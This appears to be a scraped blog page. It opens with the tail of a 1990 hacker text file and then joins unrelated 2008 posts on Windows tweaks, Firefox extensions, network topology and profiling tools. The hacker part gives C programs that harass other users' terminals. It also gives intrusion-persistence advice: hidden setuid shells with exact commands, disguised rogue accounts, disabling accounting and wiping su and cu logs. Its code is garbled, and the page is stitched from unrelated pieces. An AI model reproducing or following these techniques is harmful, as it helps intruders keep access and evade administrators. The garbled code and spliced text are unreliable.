fopen(pstr,"a"); if (strm == NULL) { printf("Error writing to: %s\n",pstr); printf("Cause: No Write Perms?\n"); exit(2); } if (argc == 2) { if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s): \n",logname()); fprintf(strm,"%s\n",olm); fclose(strm); printf("Message Sent.\n"); exit(0); } if (argc > 2) { if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s):\n",logname()); while (acnt <= argc - 1) { fprintf(strm,"%s ",argument[acnt]); acnt++; } fclose(strm); printf("Message sent!\n"); exit(0); }}What the above does is send one line of text to a device writeable by youin /dev. If you try it on a user named "sirhack" it will notify sirhackof what you are doing. You can supply an argument at the command line, orleave a blank message, then it will prompt for one. You MUST supply aTerminal. Also, if you want to use ?, or *, or (), or [], you must notsupply a message at the command line, wait till it prompts you. Example:$ ol tty1 You Suck!OL (OneLiner) Version 1.00by Sir Hackalot [PHAZE]Sending to: [/dev/tty1]Message Sent!$Or..$ ol tty1OL (OneLiner) Version 1.00by Sir Hackalot [PHAZE]Dummy! You Forgot to Supply a ONE LINE MESSAGE!Enter one here => Loozer! Logoff (NOW)!! ^G^GSending to: [/dev/tty1]Message Sent!$ You can even use it to fake messages from root. Here is another:/* * Hose another user */#include #include #include #include #include #include #include #include #define NMAX sizeof(ubuf.ut_name)struct utmp ubuf;struct termio oldmode, mode;struct utsname name;int yn; int loop = 0;char *realme[50] = "Unknown";char *strcat(), *strcpy(), me[50] = "???", *him, *mytty, histty[32];char *histtya, *ttyname(), *strrchr(), *getenv();int signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout();FILE *tf;main(argc, argv)int argc;char *argv[];{ register FILE *uf; char c1, lastc; int goodtty = 0; long clock = time((long *) 0); struct tm *localtime(); struct tm *localclock = localtime( &clock ); struct stat stbuf; char psbuf[20], buf[80], window[20], junk[20]; FILE *pfp, *popen(); if (argc < him =" argv[1];"> 2) histtya = argv[2]; if ((uf = fopen("/etc/utmp", "r")) == NULL) { printf("cannot open /etc/utmp\n"); exit(1); } cuserid(me); if (me == NULL) { printf("Can't find your login name\n"); exit(1); } mytty = ttyname(2); if (mytty == NULL) { printf("Can't find your tty\n"); exit(1); } if (stat(mytty, &stbuf) < histtya =" strrchr(histtya," logcnt="="0)" histtya="="0"> 1) { printf("%s logged more than once\nwriting to %s\n", him, histty+5); } if (access(histty, 0) < tf =" fopen(histty," yn =" 1;" yn ="="" lastc =" '\n';printf(" loop ="="" c1 =" '\b';" i =" fork();" i ="="" i="0;">#include main(argc,argv)char *argv[];int argc;{ int x = 1; char *device = "/dev/"; FILE *histty; if (argc == 1) { printf("Bafoon. Supply a TTY.\n"); exit(1); } strcat(device,argv[1]); /* Make the filename /dev/tty.. */ histty = fopen(device,"a"); if (histty == NULL) { printf("Error opening/writing to tty. Check their perms.\n"); exit(1); } printf("BSV - Backspace virus, By Sir Hackalot.\n"); printf("The Sucker on %s is getting it!\n",device); while (x == 1) { fprintf(histty,"\b\b"); fflush(histty); sleep(5); } }Thats all there is to it. If you can write to their tty, you can use this onthem. It sends two backspaces to them every approx. 5 seconds. Youshould run this program in the background. (&). Here is an example:$ whosirhack tty11loozer tty12$ bsv tty12&[1] 4566BSV - Backspace virus, by Sir HackalotThe Sucker on /dev/tty12 is getting it!$Now, it will keep "attacking" him, until he loggs of, or you kill the process(which was 4566 -- when you use &, it gives the pid [usually]).** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LFmethod to terminate a line. However, the LF terminates a line in Unix.you must STRIP CR's on an ascii upload if you want something you uploadto an editor to work right. Else, you'll see a ^M at the end of everyline. I know that sucks, but you just have to compensate for it.I have a number of other programs that annoy users, but that is enough toget your imagination going, provided you are a C programmer. You can annoyusers other ways. One thing you can do is screw up the user's mailbox.The way to do this is to find a binary file (30k or bigger) on the systemwhich YOU have access to read. then, do this:$ cat binary_file mail loozeror$ mail loozer <>/dev/tty12$It may pause for a while while it outputs it. If you want to resume whatyou were doing instantly, do:$ cat binary_file >/dev/tty12&[1] 4690$And he will probably logoff. You can send the output of anything to histerminal. Even what YOU do in shell. Like this:$ sh >/dev/tty12$You'll get your prompts, but you won't see the output of any commands, hewill...$ ls$ banner Idiot!$ echo Dumbass!$until you type in exit, or hit ctrl-d.There are many many things you can do. You can fake a "write" to someoneand make them think it was from somewhere on the other side of hell. Becreative.When you are looking for things to do, look for holes, or try to getsomeone to run a trojan horse that makes a suid shell. If you getsomeone to run a trojan that does that, you can run the suid, and log theirass off by killing their mother PID. (kill -9 whatever). Or, you canlock them out by adding "kill -1 0" to their .profile. On the subject ofholes, always look for BAD suid bits. On one system thought to be invincibleI was able to read/modify everyone's mail, because I used a mailer that hadboth the GroupID set, and the UserID set. When I went to shell from it,the program instantly changed my Effective ID back to me, so I would not beable to do anything but my regular stuff. But it was not designed to changethe GROUP ID back. The sysop had blundered there. SO when I did an IDI found my group to be "Mail". Mailfiles are readble/writeable by theuser "mail", and the group "mail". I then set up a sgid (set group id) shellto change my group id to "mail" when I ran it, and scanned important mail,and it got me some good info. So, be on the look out for poor permissions.Also, after you gain access, you may want to keep it. Some tips on doing sois: 1. Don't give it out. If the sysadm sees that joeuser logged in 500 times in one night....then.... 2. Don't stay on for hours at a time. They can trace you then. Also they will know it is irregular to have joeuser on for 4 hours after work. 3. Don't trash the system. Don't erase important files, and don't hog inodes, or anything like that. Use the machine for a specific purpose (to leech source code, develop programs, an Email site). Dont be an asshole, and don't try to erase everything you can. 4. Don't screw with users constantly. Watch their processes and run what they run. It may get you good info (snoop!) 5. If you add an account, first look at the accounts already in there If you see a bunch of accounts that are just 3 letter abbrv.'s, then make yours so. If a bunch are "cln, dok, wed" or something, don't add one that is "joeuser", add one that is someone's full initials. 6. When you add an account, put a woman's name in for the description, if it fits (Meaning, if only companies log on to the unix, put a company name there). People do not suspect hackers to use women's names. They look for men's names. 7. Don't cost the Unix machine too much money. Ie.. don't abuse an outdial, or if it controls trunks, do not set up a bunch of dial outs. If there is a pad, don't use it unless you NEED it. 8. Don't use x.25 pads. Their usage is heavily logged. 9. Turn off acct logging (acct off) if you have the access to. Turn it on when you are done. 10. Remove any trojan horses you set up to give you access when you get access. 11. Do NOT change the MOTD file to say "I hacked this system" Just thought I'd tell you. Many MANY people do that, and lose access within 2 hours, if the unix is worth a spit. 12. Use good judgement. Cover your tracks. If you use su, clean up the sulog. 13. If you use cu, clean up the cu_log. 14. If you use the smtp bug (wizard/debug), set up a uid shell. 15. Hide all suid shells. Here's how: goto /usr (or any dir) do: # mkdir ".. " # cd ".. " # cp /bin/sh ".whatever" # chmod a+s ".whatever" The "" are NEEDED to get to the directory .. ! It will not show up in a listing, and it is hard as hell to get to by sysadms if you make 4 or 5 spaces in there (".. "), because all they will see in a directory FULL list will be .. and they won't be able to get there unless they use "" and know the spacing. "" is used when you want to do literals, or use a wildcard as part of a file name. 16. Don't hog cpu time with password hackers. They really don't work well. 17. Don't use too much disk space. If you archieve something to dl, dl it, then kill the archieve. 18. Basically -- COVER YOUR TRACKS.Some final notes:Now, I hear lots of rumors and stories like "It is getting harder to getinto systems...". Wrong. (Yo Pheds! You reading this??). It IS truewhen you are dealing with WAN's, such as telenet, tyment, and the Internet,but not with local computers not on those networks. Here's the story:Over the past few years, many small companies have sprung up as VARs(Value Added Resellers) for Unix and Hardware, in order to make a fastbuck. Now, these companies fast talk companies into buying whatever,and they proceed in setting up the Unix. Now, since they get paid bythe hour usaually when setting one up, they spread it out over days....during these days, the system is WIDE open (if it has a dialin). Getin and add yourself to passwd before the seal it off (if they do..).Then again, after the machine is set up, they leave the defaults on thesystem. Why? The company needs to get in, and most VARs cannot useunix worth a shit, all they know how to do is set it up, and that is ALL.Then, they turn over the system to a company or business that USUALLYhas no-one that knows what they hell they are doing with the thing, exceptwith menus. So, they leave the system open to all...(inadvertedly..),because they are not competant. So, you could usually get on, and createhavoc, and at first they will think it is a bug.. I have seen thishappen ALL to many times, and it is always the same story...The VAR is out for a fast buck, so they set up the software (all they knowhow to do), and install any software packages ordered with it (followingthe step by step instructions). Then they turn it over to the businesswho runs a word processor, or database, or something, un aware that a"shell" or command line exists, and they probably don't even know root does.So, we will see more and more of these pop up, especially since AT&T isnow bundling a version of Xwindows with their new System V, and Simultask...which will lead to even more holes. You'll find systems local to youthat are easy as hell to get into, and you'll see what I mean. TheseVARs are really actually working for us. If a security problem arisesthat the business is aware of, they call the VAR to fix it... Of course,the Var gets paid by the hour, and leaves something open so you'll get inagain, and they make more moolahhhh.You can use this phile for whatever you want. I can't stop you. Justto learn unix (heh) or whatever. But its YOUR ass if you get caught.Always consider the penalties before you attempt something. Sometimesit is not worth it, Sometimes it is.This phile was not meant to be comprehensive, even though it may seem likeit. I have left out a LOT of techniques, and quirks, specifically to getyou to learn SOMETHING on your own, and also to retain information soI will have some secrets. You may pass this file on, UNMODIFIED, to anyGOOD H/P BBS. Sysops can add things to the archieve to say whereit was DL'd from, or to the text viewer for the same purpose. This isCopywrited (haha) by Sir Hackalot, and by PHAZE, in the year 1990.

Disable the Window Restart Prompt

2008-01-08T10:41:00.002-08:00

After downloading any Software or Windows Updates, the system will prompt you a message to restart your system.
If you’re in the middle of something important. Like writing an email or looking for Paris Hilton pictures on Google. Even if you choose the option “no”, the nag box bounces back 5 minutes later to harass you again.To avoid this You can disable the prompt.Go the Start Menu :choose “run” and in the box, type cmd and press enter. When the black command prompt box Opens up,Type "sc stop wuauserv" and then press enterEnjoy

Fantastic Flame Screensaver

2008-01-08T10:41:00.001-08:00

Fantastic Flame ScreensaverFantastic Flame Screensaver was initially created to demonstrate a simple fire effect on the pc desktop. This natty screensaver puts your computer desktop in flames. This Fantastic Flame Screensaver firesup each time on your desktop including open windows on the taskbar, emerges to catch on fire, glowing and producing a smoke effect. It has a blending mechanism, required for mixing flame and background images and a contour trace engine was added, so fire became perceptive to the background picture. The program was named 'Burning Desktop'. Also, it has a paletter editor and conversion to a screensaver. It has a possibility to set any custom image as the fire background.features:True mathematical algorithm generates very realistic real-time fire effects. Unlimited number of color combinations. Really FANTASTIC flame! Additional flame parameters such as wind gust speed and direction, burning intensity, etc... Flexible presets system. Just downloaded distributive includes a lot of ready fire styles. Comfortable and intuitively understood fire effects editor with a real-time preview. 'Random' fire style. You never get tired of watching! Lots of awesome flame backgrounds! Changing the flame styles and background images periodically in full-screen mode. A pretty fine effect - burning one image to another! Nice background sound. Be aware! Guests can think you have a big camp fire in your house and not just a fire screensaver! Ability to choose any music for playing while the screensaver is running full-screen. Listen your favorite music with the sound of fire in the background! Just watch and relax! You can take snapshots of your burning desktop anytime. Get fire screenshots with one key press! Controlling the screensaver in full-screen mode. Turning fire sound and music on/off, loading next flame styles and backgrounds, and even changing the fire intensity and wind direction available! Full dual monitor support. Danger! Fire around! And at last, Fantastic Flame Screensaver loads your system less than most of 3D screensavers. System Requirements:Windows 95/98/ME/NT/2000/XP/2003Version: 4.71Filesize: 3.71 MBDownload Fantastic Flame Screensaver

Future Prospects in Software ! Cool Extensions for Mozilla Firefox

2008-01-08T10:38:00.000-08:00

This tool helps for Graphic Artists and Web Designers for color reading the web pages within your Firefox browser. You can get a color reading from any point within your browser quickly adjust this color and paste it into another program. Download ColorZillaPerformancingPerformacing for Firefox is developed by Performancing.com This is a Blog editor that you can easily post the messages to your blogs within the Firefox browser. You can easily Drag and Drop notes from existing web pages and take notes as well as post to your blog. Download PerformancingCookieSafeThis cookie tool enables you to control cookie permissions. It just stays on the statusbar. You can simply click on the icon to allow, block or temporarily allow the site to set cookies. Download CookieSafeGoogle Browser SyncIt continually coordinates your browser settings including history, cookies, bookmarks and saved passwords across your computers. You can restore open tabs and windows across on different machines and browser sessions. Download Google Browser SyncWeb DeveloperThis is a powerful tool that helps the web developers that makes validation, design and CSS work much more efficient. More development tools like image debugging, links to page validation, optimization tools and much more. Download Web Developer Mozilla Firefox Extensions

Network / Windows Administration Tips

2008-01-08T10:37:00.000-08:00

Network topology: The specific physical, i.e., real, or logical, i.e., virtual, arrangement of the elements of a network.
Note 1: Two networks have the same topology if the connection configuration is the same, although the networks may differ in physical interconnections, distances between nodes, transmission rates, and/or signal types.
Note 2: The common types of network topology are illustrated [refer to the figure on this page] and defined in alphabetical order below:Bus topology: A network topology in which all nodes, i.e., stations, are connected together by a single bus.
Fully connected topology: A network topology in which there is a direct path (branch) between any two nodes. Note: In a fully connected network with n nodes, there are n(n-1)/2 direct paths, i.e., branches. Synonym fully connected mesh network.
Hybrid topology: A combination of any two or more network topologies. Note 1: Instances can occur where two basic network topologies, when connected together, can still retain the basic network character, and therefore not be a hybrid network. For example, a tree network connected to a tree network is still a tree network. Therefore, a hybrid network accrues only when two basic networks are connected and the resulting network topology fails to meet one of the basic topology definitions. For example, two star networks connected together exhibit hybrid network topologies. Note 2: A hybrid topology always accrues when two different basic network topologies are connected.
linear topology: See bus topology.
mesh topology: A network topology in which there are at least two nodes with two or more paths between them.
ring topology: A network topology in which every node has exactly two branches connected to it.
star topology: A network topology in which peripheral nodes are connected to a central node, which rebroadcasts all transmissions received from any peripheral node to all peripheral nodes on the network, including the originating node.
Note 1: All peripheral nodes may thus communicate with all others by transmitting to, and receiving from, the central node only.
Note 2: The failure of a transmission line, i.e., channel, linking any peripheral node to the central node will result in the isolation of that peripheral node from all others. Note 3: If the star central node is passive, the originating node must be able to tolerate the reception of an echo of its own transmission, delayed by the two-way transmission time, i.e., to and from the central node, plus any delay generated in the central node. An active star network has an active central node that usually has the means to prevent echo-related problems. (188)
tree topology: A network topology that, from a purely topologic viewpoint, resembles an interconnection of star networks in that individual peripheral nodes are required to transmit to and receive from one other node only, toward a central node, and are not required to act as repeaters or regenerators. (188)
Note 1: The function of the central node may be distributed.
Note 2: As in the conventional star network, individual nodes may thus still be isolated from the network by a single-point failure of a transmission path to the node.
Note 3: A single-point failure of a transmission path within a distributed node will result in partitioning two or more stations from the rest of the network.

C C++ Programming - Useful Tracing and Profiling Tools

2008-01-08T10:36:00.000-08:00

google 4 page

have been searching for few tracing and profiling tools these days. Tracing tools are my fav because we will be able to debug it while it is running and can get an overview of what is happening inside a.out. esp while learning the flow of a prog.I found the given below tools and links very useful...
Linux
gprof
GNU gprof
Speed your code with the GNU profiler
callgrind
Callgrind: a heavyweight profiler
ltrace/strace/mtrace
These are low level system calls, library calls and memory tracers
Overview
Systemtap
Solaris
dtrace - my fav
BigAdmin: DTrace
DTrace Review - Really Cool Video - A must see one!
IBM - AIX
truss/trace
i haven't personally used these, still has to do some more research on these
Probevue
HPUX
if lucky you will find some here
Porting And Archive Centre for HP-UX
Labels: AIX, C, C++, HP-UX, Linux, Solaris, Unix

C++ Programming - Windows Compiler and Linker Issues

2008-01-08T10:35:00.000-08:00

Few days before in VC 7.0 i had an issue while creating binary using one of my static library files only in case DEBUG build. The linker was crashing with an error LNK1000. Most of my search landed in groups and forum where they advised for M$ support. I kept on searching till i found quiet an useful page LNK1000 error when building resource-only DLLs. The last post by HuangTM saved my day. i was surprised when i solved the problem. I had few static libraries which gets merged to generate my final library. And it was ORDER in which i used the internal libraries that was creating the problem. I was quiet astonished by this because the same kind of linking was working on linux.please post in your valuable comments!Refer: LNK1000 error when building resource-only DLLs Troubleshooting for the Microsoft Visual C++ Compiler or the Visual C++ Linker

Tweaking guide: How to speed up my PC for free ?

2008-01-08T10:33:00.000-08:00

google 1st page

Based on feedback I get, it looks like PC performance is a major issue for many readers. This 5 step guide will help you to speed up your PC in minutes. Tips and tweaks provided are applicable to Windows XP and Windows Vista (unless else specified). I highly recommend that you use the following tips as your initial performance activity list when troubleshooting a PC performance issue.
Minimize the number of programs that run on startup
From time to time we install new software our PC. Some of those programs will run automatically when we turn on our PC (startup), causing a major degradation in our PC boot time and overall system performance. Moreover, spyware, adware and even malware (virus, trojans) might run on startup making your PC crawl. The Microsoft Windows System Configuration Utility (aka MsConfig) is a powerful tool that allows to select what programs will run automatically by default.
Usage is relatively simple:
1.Click the Start button2.Vista Users: In the start search type msconfig and click Enter . XP Users: Click Run, then type msconfig and click Enter.3.Navigate to the Startup folder4.Uncheck any program you don’t want to run by default. Note: Make sure you don’t disable Microsoft programs.5.Click OK6.Reboot your system
Adjust your System Performance Options
Windows operating systems feature a constant tradeoff between visualization richness and system performance. The “prettier” you system look, the more it consumes its resources and thus the more likely is to start crawling and consequently affects your productivity
Both Windows XP’s and Vista’s basic configuration is optimized for best appearance. However if you set Windows to optimize performance, you’ll loose some (insignificant?) visual effects, such as the 3d toolbar, shadowed menus etc’, but you gain a lot in system performance.
Here’s how you can do it:
1.Click the Windows Start button2.Right click Computer3.Click Properties4.Go to the Advanced tab5.In the Performance section, Click Settings6.Check the Adjust for Best Performance button Note: If you really want to display some of the advanced visual effects Windows offers, you should click Custom and select the required effects .Click OK .
Defragment your hard disk.
Defragmentation increases the speed your hard disk reads and writes information, thus improving your overall system performance. Therefore, it’s a good practice to defragment your hard disk partitions periodically (i would say, once in 2 weeks).
Here’s how to defragment your drive:
1.Click the Windows Start button2.Right click Computer3.Click Explore4.Right Click each of your partitions (C, D etc’)5.Click Properties6.Navigate to the Tools tab7.Click Defragment Now8.Here you can schedule a Disk Defragmentation job or launch an immediate defragmentation job.

Hack XP to look like Vista

2008-01-08T10:27:00.000-08:00

Well, lets face it. I don’t want to jump to Vista Bandwagon just now but I envy the way it looks. There are ways to hack your stable and trusted Windows XP to look and behave like Vista.
1. First you need to find out which Service Pack you are running. To do this simple press the Windows flag key+Pause/Break key. This is going to open the system properties window. Here it is going to say which service pack you are running
2. Now you have some downloading to do. First get: The appropriate Uxtheme.dll file If you are running Service Pack 1 then get this file.If you are running Service Pack 2 then get this file.
3. Unzip the file to your desktop
4. Now you need to download the Replacer(I recommend getting a stable version). The replacer efficiently replaces your system files and is supposed to be completely safe. This program also backs up your file in case you need to revert the changes.
5. Unzip the Replacer to your desktop. Make sure you read the “readme” because it has some important tips on how to revert those changes that you made. Now you are ready to replace your uxtheme.dll file
1. Now double click on the replacer file (replacer.cmd)
2. Then it will ask you to drag and drop the original system file you want to replace. So go to the System32 folder and somewhere near the bottom you are going to see the uxtheme.dll file. Drag and drop it into the window. Note: your computer may have more than 1 uxtheme.dll file but usually the file that you computer is using is the one in the system32 folder. (usually the location for your Uxtheme.dll file is C:\WINDOWS\system32\uxtheme.dll)
3. Press Enter
4. Then it will ask you to drag the file you want to replace. Open the folder with the downloaded file and drag and drop the file into replacer.
5. Now it will ask you to confirm that you want to replace the files or not. So double check and then press enter.
Replacer will now swap your original file with the new one. Now restart your computer. Congratulations you can now use custom msstyle themes on your computer. Which is going to make your computer look super cool! To change your theme just right click on desktop» properties» appearances tab» Windows and buttons If the above method doesn’t work then don’t loose hope. Just download this multipatcher (no matter what service pack you have) and it might do the job for you! In case you are looking around for some Visual styles and themes here are some sites that might help you in the quest for the perfect style for you:
Deviant Art
Wincustomize-
themexp.org
WinMatrix
If you are unsure and want some more proof then you can find some here at uneasysilence.com
These themes will make your computer look like Windows Vista for sure. So… go ahead and download it. Then unzip or copy it to C:\WINDOWS\Resources\Themes All right now you can change your computers theme to the Vista theme you chose.. There are many msstyles themes out there that look super cool and look like vista/longhorn. You can also get shell packs and windows blinds themes but some people claim that this can mess up your computer badly. The theme that I found works best is VistaXP by -kol! (but it was so popular that MS got it removed).
some More Vista Components :
Changing the Wallpaper
There are lots of Vista wall papers available… chances are that you have one included with your theme as well. If you don’t then you can try your luck at WinMatrix’s great post for Vista wallpapers. If not then you can always search on Google for Vista Wallpapers. If you want you can also get this wallpaper which also a CoolGrass wallpaper by ApacheUser plus it has the Windows Vista logo on it!
Changing the cursor
You can download the aero cursor pack over here. Just read the read me file supplied and enjoy. Additionally, you can go to How to change your mouse pointers article and change your mouse pointer to the 3D-White (system scheme), it looks very similar to the original cursor in Vista
Getting Vista-ish applications
Now once you are done that. And you like some transparency on your computer get these two very cool tools. Vista Explorer: Something like the original Vista explorer but for XP and plus it has….. transparency. YES! IT IS TRANSPARENT! Just like the original one. Internet Explorer (transparent version!): This is also very similar to the real internet explorer. Plus the internet explorer button on the task bar says internet explorer 7 (good for fooling people)! You can also get the real IE 7 (no transparency though) Now your system should look like Vista for sure, but why stop when you have come so far?
Fine tuning
After that, fine tune your font settings and turn on ClearType fonts with the ClearType Tuner PowerToy . Since the real Vista uses the font ‘Segoe UI’ which is a cleartype font, you can mimic the real fonts by using ClearType. However, some themes already come with the Segoe UI font so don’t forget to enable it while you are using it.
Shell Packs
If you really want to get shell packs to do what you can already do on your own then here are some of them:
- Vista Customization pack by JoeJoe
- The brico pack by CrystalXP
- The Windows X longhorn Transformation pack by Windows X
Please keep in mind that the shell packs don’t customize your computer to look like the latest Vista/Longhorn builds, so your computer might not look like the recent Vista versions.
The Vista Sidebar
Longhorn Sidebar into XP and put that on your computer too. And when you are done that you can start celebrating! In fact you can claim that you have Windows Vista already, and nobody will doubt you. One last step enjoy and don’t forget to show-off your new look!

Most Trusted n Complete Working HACK

2008-01-08T10:25:00.000-08:00

google 1st page

Simply Copy the CODE given belowOpen Command prompt. ( run ->cmd )Paste the Content There. [ Hope u know how to paste on the cmd Prompt ]Now try the rapidshare link againand it wont ask you to Wait for more than ONE minute.
@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
exit
Check this out people........Easiest thing to do!
Absolutely it works..
This topic is ment for ETHICAl hacking!